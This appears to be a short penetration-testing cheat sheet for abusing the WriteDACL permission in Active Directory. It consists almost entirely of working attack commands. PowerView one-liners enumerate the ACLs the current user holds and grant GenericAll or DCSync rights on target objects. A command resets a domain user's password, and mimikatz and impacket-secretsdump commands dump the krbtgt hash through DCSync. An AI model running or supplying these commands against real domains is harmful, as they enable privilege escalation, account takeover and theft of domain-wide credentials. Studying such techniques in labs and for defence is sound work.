WriteDACL

WriteDACL

Enumeration

PowerView

Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}

GenericAll

Abuse WriteDACL

PowerView

Add-DomainObjectAcl -TargetIdentity sieng.chantrea -PrincipalIdentity khan.chanthou -Rights All

Verify ACL

PowerView

Get-ObjectAcl -Identity sieng.chantrea -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}

We can either reset password or dcsync

net user sieng.chantrea Password123 /domain

DCSync

PowerView

Add-DomainObjectAcl -TargetIdentity Object_Name -PrincipalIdentity khan.chanthou -Rights DCSync

We can perform DCSync Attack

mimikatz# lsadump::dcsync /user:krbtgt

impacket-secretsdump -just-dc-user krbtgt vulnableone/sqlsvc@10.10.10.10